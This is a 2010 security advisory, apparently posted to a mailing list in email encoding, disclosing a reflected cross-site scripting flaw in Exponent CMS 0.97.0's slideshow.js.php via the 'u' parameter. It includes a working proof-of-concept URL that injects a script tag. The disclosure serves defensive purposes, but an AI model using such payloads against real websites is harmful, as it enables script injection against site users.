Exponent Slideshow XSS Vulnerability
Title: Exponent Slideshow XSS Vulnerability
Vendor: Exponent
Product: Exponent CMS
Tested Version: 0.97.0
Threat Class: XSS
Severity: High
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
=3D=3D=3D=3D=3D Description =3D=3D=3D=3D=3D
The file "modules/slideshowmodule/slideshow.js.php" is prone to XSS vulnera=
bilities. Multiple instance of variable $_GET['u'] gets outputted to the pa=
ge without proper sanitization.
=3D=3D=3D=3D=3D Impact =3D=3D=3D=3D=3D
Malicious java script code can be executed in the context of the affected w=
eb site.
=3D=3D=3D=3D=3D Proof of Concept =3D=3D=3D=3D=3D
http://target/modules/slideshowmodule/slideshow.js.php?u=3D%3Cscript%3Ewind=
ow.alert(String.fromCharCode(88=2C83=2C83))=3B%3C/script%3E
=3D=3D=3D=3D=3D Workaround =3D=3D=3D=3D=3D
No workaround is available at the time.
=3D=3D=3D=3D=3D Disclosure Timeline =3D=3D=3D=3D=3D
June=2C 16 2010 - Vendor notification.
July=2C 07 2010 - No vendor reply. Public disclosure.
=3D=3D=3D=3D=3D References =3D=3D=3D=3D=3D
http://www.exponentcms.org =20
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=3D60969=